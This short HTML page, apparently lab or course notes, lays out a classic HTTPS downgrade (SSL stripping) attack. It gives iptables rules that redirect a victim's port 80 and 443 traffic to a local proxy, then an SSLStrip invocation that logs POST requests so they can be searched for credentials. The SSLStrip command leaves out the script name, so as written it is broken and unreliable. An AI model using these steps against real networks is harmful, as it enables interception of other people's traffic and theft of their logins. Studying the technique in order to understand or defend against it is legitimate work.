<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>HTTPS downgrade attack</title>
</head><body><b><u>CLASSIC HTTPS DOWNGRADE ATTACK<br/>
</u></b><br/>
<i><u>Outline</u></i><br/>
Using iptables, we redirect all HTTP and HTTPS traffic to a tool called SSLStrip. This tool<br/>
1) creates a log of all HTTP traffic sent to or from the victim, which we can search for credentials and other sensitive data<br/>
2) It attempts to break the encryption of any HTTPS traffic it encoutners ussing SSL Stripping. <br/>
<br/>
<i><img src="image.png" /><br/>
Proceedure:<br/>
</i>1) Append a new rule to iptables PREROUTING chain. <br/>
(by appending the REDIRECT rule shown below to PREROUTING, we ensure that all HTTP and HTTPS traffic is redirected to a proxy running on port 10000 in userspace)<br/>
<br/>
:~# iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --jump REDIRECT --to-port 10000<br/>
:~# iptables --table nat --append PREROUTING --protocol tcp --destination-port 443 --jump REDIRECT --to-port 10000<br/>
<br/>
2) Add the following call to SSLStrip using the -p flag to log only HTTP POST requests. <br/>
:~# python -l 10000 -p -w ./sslstrip.log <br/>
<br/>
<b>Run the http-downgrade-attack.sh script<br/>
</b><br/>
this technique may not work because of an enhancement of the HTTPS protocol that was designed ot mitigate this exploit. </body></html>